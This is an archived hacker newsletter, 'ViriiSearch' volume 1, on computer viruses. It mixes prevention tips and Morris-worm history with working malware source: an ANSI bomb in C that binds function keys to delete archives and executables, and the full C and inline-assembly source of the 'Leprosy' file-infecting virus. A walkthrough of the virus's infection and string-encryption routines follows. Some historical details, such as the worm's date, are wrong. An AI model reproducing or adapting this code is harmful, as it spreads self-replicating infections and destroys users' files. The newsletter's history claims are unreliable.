💾 Archived View for spam.works › mirrors › textfiles › virus › cmvs-1.v1 captured on 2023-06-16 at 21:01:29.
-=-=-=-=-=-=-
DISCLAIMER:
The author will NOT accept responsibility for any damage to your
computer media and/or files, or responsibility for any action you might
take that will result in legal proceedings, the source code, if any, in
this newsletter is THE REAL THING, and you, after you read this, will be
well aware of what virii are capable of, and knowing that, it is expected
that you will act responsibly.
DISCLAIMER II:
All I know about programming I have learned on my own, and did not go to
school for, and am still learning. As a result, I am sometimes prone to
make mistakes, and be wrong about things, so please be patient if I should
make a mistake, or say something that isn't true, which would be totally
unintentional.
ViriiSearch
-----------
The Virus Research Newsletter
Volume 1, Number 1
CREDITS:
-----------------------------------------------------------------------------
Author...................................................Criminal Minded <tm>
Editor...................................................Criminal Minded <tm>
Ideas, Source, Examples Supplied By......................Criminal Minded <tm>
Facts Stolen From Several Sources By.....................Criminal Minded <tm>
-----------------------------------------------------------------------------
Introduction:
Welcome To The First Issue Of Viriisearch, The Virus Research Newsletter.
I have always had a fascination of computer virii, since I first heard the
word. I, like a lot of people, had no idea what they were about, and was
extremely curious. And this newsletter will cover my process as I find out
more about them. How they are written, why they act like they do, and if
possible, why people would write them.
In this issue:
Prevention And Protection Methods
The "Internet Worm"
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
Benign VS Malignant Virii
Sample Source Code Of Virii
Discussion Of The Infection And Encryption Methods Used By "Leprosy"
The "Uncompress" Virus
"Suicidal Tendencies" Department/Virus Of The Month
Discussion Of Anti Viral Software
Things You Should Know
-----------------------------------------------------------------------------
Prevention And Protection Methods:
-----------------------------------------------------------------------------
After the infamous "Michelangelo" panic, I realized what the masses are
lacking is virus literacy. If people had a understanding of them, and knew
the appropriate methods of prevention, and dealing with a infection, the
situation would've never been blown out of proportion like it was. When I
hear people ask questions such as "If I Put My Toothbrush Near A Infected
Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok,
maybe that example is a little exaggerated, but some of the questions are
hitting close to that level of stupidity, so here are some protection and
prevention methods:
1. If you download a file from a public BBS, or a friend gives you a file
that he downloaded from somewhere, be sure and uncompress the file onto
a floppy and run your virus scanner on it. NEVER run a new file without
checking it first. Some people believe a virus scanner can spot a file
that is infected within a compressed file by running the virus scanner
on it, this is NOT true. You have to decompress the file first.
By doing this, you are dropping your chances of infection considerably
BUT there is always the chance of a unknown virus that the scanner won't
spot so that is why you have to ALWAYS have a backup of all your data on
tape or disk. That way if the unknown virus wipes your hard drive, you
have the backup and nothing is lost.
2. In the event of a virus infection, shut your computer off immediately and
wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some
virii can survive through a warm boot. Always do a "cold boot" (Shut the
computer OFF). After the 10-20 seconds, boot your computer from a CLEAN
WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from
a WRITE PROTECTED disk. (The reason for having the disks write protected
is just in case the virus is still lurking around, it won't be able to
write itself and infect the floppies). If the virus is a known one, have
the virus scanner either fix the infected files, or delete them (and
replace from your backup) or make a note of the infected files and erase
them manually.
3. How do you spot a attack by a unknown virus?
A) Change in sizes of files
B) Change of file dates/times
C) Deleted files
D) Slower processing time
E) Unusual messages
F) Disk activity, more than usual (Writing to the disk when it's not
neccesary)
4. What to do in the event of a unknown virus attack?
A) Follow steps of shutting machine off and re-booting as outlined in
#2
B) Run your virus scanner and have it look for files that changed in
size or date (if your scanner has a feature that makes note of
original virus sizes/dates/times)
C) If your virus scanner doesn't make note of original sizes/dates/times
you can always make note of them manually and then check them yourself.
It's time consuming, but can prevent serious damage to your data, and
you should try to isolate a infected file and send it to ME (info on
how to get it to me at the end of the newsletter) so I can attempt to
dissect it and notify the appropriate person of the new virus.
D) Some virus scanners come with a TSR that will prevent any writing to
disk, it will pop a window or message on the screen saying: Attempting
to write to <filename> Do you wish to do so? If something is trying to
write to a file that shouldn't be written to at that time, chances are
you are dealing with a unknown virus and should say no. Then try to
find and isolate the virus.
E) How do you spot a unknown virus or a known virus without running
a virus scanner?
1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority
of them are .COM files so if you have, let's say, a 6K .COM file
that claims to be a "awesome game" I'd be a little bit suspicious.
2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over
the years I have run into files named that, when people tried to
infect my computer. At least they could've named it something else
not so obvious.
3) As stated in #1, the MAJORITY of them are small .COM files but they
can be .EXE files as well, and bigger then 10K.
All it takes is a little bit of common sense, and 99% of what could've been
virus attacks on your computer can be prevented. All you have to remember is
that they cannot infect your machine unless run first...BUT there is one
virus out there that, when uncompressed, activates itself. This virus does
NOT have to be executed in order to infect your machine, and it will be
discussed later on. In the event of where this "uncompress" virus wipes some
of your data, or any other virus, that's what backups are for. ALWAYS HAVE A
BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a
program when there is a virus in memory because, chances are, that floppy
will get ruined/infected as well, unless it is write protected. The instant
you are aware of a infection, shut the machine off! Because there are some
virii that, upon finding a write protected floppy that it cannot infect, or
something else it can't do, "get mad" and cause destruction.
-----------------------------------------------------------------------------
The "Internet Worm"
-----------------------------------------------------------------------------
This has to be the most widely publicized case of a virus attack ever.
On 10/02/88, Robert Morris Jr., a graduate student, wrote and released a worm
that infected "Internet" the worldwide network. Within hours, it infected
thousands of computers. The worm was benign, not causing any damage to files
or media, but replicated itself over and over rapidly, and resulted in the
computers on Internet having to be shut down and all copies of the worm
removed. Some of the hosts were still disconnected from the network eight
days later, showing the impact this worm had. Morris claimed he did it as a
experiment, and made a mistake in how fast it actually would replicate. The
media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm
front page coverage. On November 4th, teams at several institutions went to
work and successfully "decompiled" the worm and studied it in the language it
was written in, "C language", but the source code was never released for fear
of hackers using the source for malicious purposes. In the end, Morris was
removed from school, ordered to pay $10,000 in fines, perform 400 hours of
community services and was on 3 years probation. Some people argued as to
whether or not Morris was guilty because he evidently didn't do it to cause
damage, but rather as a experiment that went wrong.
What the worm did: It hacked it's way into hosts attached to the internet by
cracking passwords and then replicated itself rapidly, taking up all the
memory and forcing the hosts to be shut down.
-----------------------------------------------------------------------------
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
-----------------------------------------------------------------------------
Trojans: Programs disguised as a useful program or a existing real program
that can cause damage on your system.
Worms: Benign virii, rarely causing damage to media or files, such as the
Internet worm.
Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys,
when pressed, to do other things.
Example: If a ansi bomb was in memory, and it remapped the "K" key to erase
all the files in the current directory, as soon as you pressed K
the files would be gone. Usually when you type C>ERASE *.*
MS-DOS will respond with: All the files in the current directory
will be deleted! Are you sure (y/n)?
Some ansi bombs are intelligent and can prevent such DOS messages
from appearing.
-----------------------------------------------------------------------------
Here is the source code to a simple ansi bomb:
-----------------------------------------------------------------------------
#include <stdio.h>
#define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S)
#define F1 59
#define F2 60
#define F3 61
#define F4 62
main()
{
KILL(F1, "DEL *.ZIP");
KILL(F2, "DEL *.ARJ");
KILL(F3, "DEL *.COM");
KILL(F4, "DEL *.EXE");
}
-----------------------------------------------------------------------------
This just assigns the string (DEL *.ZIP etc) to the respective keys. If this
ansi bomb was in memory, and you pressed F1, it would delete all the files
in the current directory with the extension of .ZIP. The command (DEL *.ZIP)
would appear on the screen though, and you could use a file recovery program
to recover the deleted files. There are more lethal ansi bombs, ones that can
format your hard drive and other such destructive acts.
Prevention: Use NANSI or ZANSI rather than ANSI and the ansi bombs won't work.
-----------------------------------------------------------------------------
Virii: Destructive programs that use 'stealth' techniques, and can replicate.
Not All virii are destructive, some can be benign, and just pop up
annoying messages time to time or slow down system speed.
-----------------------------------------------------------------------------
No more will be discussed of ANSI Bombs or Trojans as this newsletter is
dedicated entirely to virii.
-----------------------------------------------------------------------------
Benign VS Malignant Virii:
-----------------------------------------------------------------------------
Benign Virii do not cause damage but do things such as take up all the memory,
slow processing speed down, and send annoying messages to the console, or the
printer, etc...
Maligant, or Malicious, Virii cause actual destruction, deleting files,
destroying the FAT or boot sector, locking up the computer, formatting disks
or hard drives, etc...
-----------------------------------------------------------------------------
Virus Source Code:
-----------------------------------------------------------------------------
Now for the real thing, we will start with the C Language source code to the
"Leprosy" Virus.
-----------------------------------------------------------------------------
#pragma inline
#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */
char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */
const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */
char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */
/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */
int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );
/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/
int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}
int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}
void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}
int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}
void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}
void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
-----------------------------------------------------------------------------
With source code discussed in this newsletter, main areas covered will be on
encryption techniques, how the virus infects files, how they 'replicate'
and 'breed' and how 'stealth techniques' are implemented in the code.
In this case we will cover how the virus infects the files and encrypts.
-----------------------------------------------------------------------------
Infection Method:
-----------------------------------------------------------------------------
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
-----------------------------------------------------------------------------
void infect( void ) is just what he named this function.
The function will return nothing, and be called with no parameters as the two
"voids" suggest.
Register DX points to the filename as declared in the structure "_dta"
-----------------------------------------------------------------------------
_dta structure:
-----------------------------------------------------------------------------
struct _dta
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80;
-----------------------------------------------------------------------------
Next in the "infect" function, 0x00 is assigned to the CX register.
With function 43H in assembly, register CX is assigned with the bit of the
attribute that you want to set the file to.
Bit: Attribute:
0 Read Only
1 Hidden
2 System
3-4 Reserved
5 Archive
6-15 Reserved
Because the author assigned 0x00 to CX, none of the above attributes were set
on the file, allowing it to be written to.
Next in the "infect" function is 0x01 being assigned to register AL
0x01 is telling the program we want to SET attributes.
Then following that is: 0x43 being assigned to AH
Which is telling the program we want to use function 43H (Get/Set Attributes)
The current handle is assigned to register BX
The size of the virus code, or the number of bytes to write, stored in the
integer "virus_size" is assigned to register CX
virus_size is declared and initialized at the beginning of the source code
as a integer with the value "666"
Then the virus code is written to the file, the file is closed and the
original date and time the file had are restored.
-----------------------------------------------------------------------------
The Method Of Encryption:
-----------------------------------------------------------------------------
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
-----------------------------------------------------------------------------
The above function used in "Leprosy", called "print_s" accepts one parameter,
a string of text, like these ones defined at the beginning of the Leprosy
source code:
-----------------------------------------------------------------------------
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
-----------------------------------------------------------------------------
Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17
being the hexadecimal code for a carriage return and \x14 the code for a line
feed.
-----------------------------------------------------------------------------
When a string is passed to the "print_s" function, it is un-encrypted.
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
would result in the following being printed to the screen:
------------------------------------------------------------
NEWS FLASH!! Your system has been infected with the
incurable decay of LEPROSY 1.00, a virus invented by
PCM2 in June of 1990. Good luck!
-----------------------------------------------------------
The compiler I currently use does not accept inline assembly
code as the author of leprosy had in his source so I modified
the "print_s" function so I could compile it:
For those interested, I use Microsoft Quick C (C) Microsoft
-----------------------------------------------------------
/* NOTE: I removed the . from the end of each message because that is */
/* A $ when un-encrypted, and the $ to terminate the string is only */
/* required for the assembly version of the "print_s" function */
/* Also: The hexadecimal constants in the strings are as follows: */
/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */
#include <stdio.h>
#define CRLF "\x17\x14"
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14"
};
void print_s (char *s);
int main (void);
main()
{
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
}
void print_s (char *s) {
char *p = s;
while ( *p ) {
*p -= 10;
p++;
}
printf("%s\n",s);
}
-----------------------------------------------------------------------------